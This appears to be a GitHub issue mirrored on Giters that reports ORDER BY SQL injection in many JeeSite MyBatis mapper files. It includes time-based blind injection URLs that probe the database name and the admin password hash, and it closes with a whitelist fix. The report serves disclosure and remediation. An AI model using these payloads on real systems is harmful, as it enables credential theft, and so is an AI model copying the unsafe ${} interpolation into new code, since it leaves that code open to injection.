Giters

thinkgem / jeesite

Java rapid development platform, based (Spring Boot, Spring MVC, Apache Shiro, MyBatis, Beetl, Bootstrap, AdminLTE), online code generation, including modules: Organization, role users, menu and button authorization, data permissions, system parameters, content management, workflow, etc. Loose coupling design is adopted; one key skin switch; account security Settings, password policies; Online scheduled task configuration; Support cluster, support SAAS; Support for multiple data sources

Home Page:http://jeesite.com

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

mybatis orderby sql injection

maybe-why-not opened this issue · comments

commented

sql mappings

jeesite\src\main\resources\templates\modules\gen\dao\mapper.xml:
  106  		<choose>
  107  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
  108: 				ORDER BY ${"$"}{page.orderBy}
  109  			</when>
  110  			<otherwise>
  ...
  132  		<choose>
  133  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
  134: 				ORDER BY ${"$"}{page.orderBy}
  135  			</when>
  136  			<otherwise>

jeesite\src\main\resources\mappings\modules\sys\UserDao.xml:
  188  		<choose>###
  189  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
  190: 				ORDER BY ${page.orderBy}
  191  			</when>
  192  			<otherwise>

jeesite\src\main\resources\mappings\modules\gen\GenTableDao.xml:
   45  		<choose>###
   46  			<when test="page.orderBy != null and page.orderBy != ''">
   47: 				ORDER BY ${page.orderBy}
   48  			</when>
   49  			<otherwise>
   ..
   60  		<choose>
   61  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   62: 				ORDER BY ${page.orderBy}
   63  			</when>
   64  			<otherwise>

jeesite\src\main\resources\mappings\modules\cms\ArticleDao.xml:
   80  		<choose>
   81  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   82: 				ORDER BY ${page.orderBy}
   83  			</when>
   84  			<otherwise>
   ..
   98  		<choose>
   99  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
  100: 				ORDER BY ${page.orderBy}
  101  			</when>
  102  			<otherwise>

jeesite\src\main\resources\mappings\modules\cms\CategoryDao.xml:
   90  		<choose>
   91  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   92: 				ORDER BY ${page.orderBy}
   93  			</when>
   94  			<otherwise>

jeesite\src\main\resources\mappings\modules\cms\CommentDao.xml:
   44  		<choose>
   45  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   46: 				ORDER BY ${page.orderBy}
   47  			</when>
   48  			<otherwise>
   ..
   62  		<choose>
   63  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   64: 				ORDER BY ${page.orderBy}
   65  			</when>
   66  			<otherwise>

jeesite\src\main\resources\mappings\modules\cms\GuestbookDao.xml:
   42  		<choose>
   43  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   44: 				ORDER BY ${page.orderBy}
   45  			</when>
   46  			<otherwise>
   ..
   60  		<choose>
   61  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   62: 				ORDER BY ${page.orderBy}
   63  			</when>
   64  			<otherwise>

jeesite\src\main\resources\mappings\modules\cms\LinkDao.xml:
   51  		<choose>
   52  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   53: 				ORDER BY ${page.orderBy}
   54  			</when>
   55  			<otherwise>
   ..
   69  		<choose>
   70  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   71: 				ORDER BY ${page.orderBy}
   72  			</when>
   73  			<otherwise>

jeesite\src\main\resources\mappings\modules\cms\SiteDao.xml:
   49  		<choose>
   50  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   51: 				ORDER BY ${page.orderBy}
   52  			</when>
   53  			<otherwise>
   ..
   67  		<choose>
   68  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   69: 				ORDER BY ${page.orderBy}
   70  			</when>
   71  			<otherwise>

jeesite\src\main\resources\mappings\jeesite\test\TestDataChildDao.xml:
   46  		<choose>###
   47  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   48: 				ORDER BY ${page.orderBy}
   49  			</when>
   50  			<otherwise>
   ..
   64  		<choose>
   65  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   66: 				ORDER BY ${page.orderBy}
   67  			</when>
   68  			<otherwise>

jeesite\src\main\resources\mappings\jeesite\test\TestDataDao.xml:
   67  		<choose>
   68  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   69: 				ORDER BY ${page.orderBy}
   70  			</when>
   71  			<otherwise>
   ..
   85  		<choose>
   86  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   87: 				ORDER BY ${page.orderBy}
   88  			</when>
   89  			<otherwise>

jeesite\src\main\resources\mappings\jeesite\test\TestDataMainDao.xml:
   58  		<choose>
   59  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   60: 				ORDER BY ${page.orderBy}
   61  			</when>
   62  			<otherwise>
   ..
   76  		<choose>
   77  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   78: 				ORDER BY ${page.orderBy}
   79  			</when>
   80  			<otherwise>

RequestMapping

sys/user/list
gen/genTable/list
gen/genTable/form
gen/genTable/save
gen/genScheme/form
gen/genScheme/save
...

time base sql injection

url:http://192.168.163.1:8088/jeesite_war/a/sys/user/list?orderBy=if(database()!=0x6a656573697465,1,sleep(0.3))
image
admin's password
url:http://192.168.163.1:8088/jeesite_war/a/sys/user/list?orderBy=if(cu.password!=0x3032613366303737326663636139663431356164633939303733346234356336663035396337643333656532383336326334383532303332,1,sleep(3))&pageSize=1&id=1
image

修复建议

建议orderby的过滤规则和普通过滤分开写,orderby白名单,[a-z0-9_],普通过滤用黑名单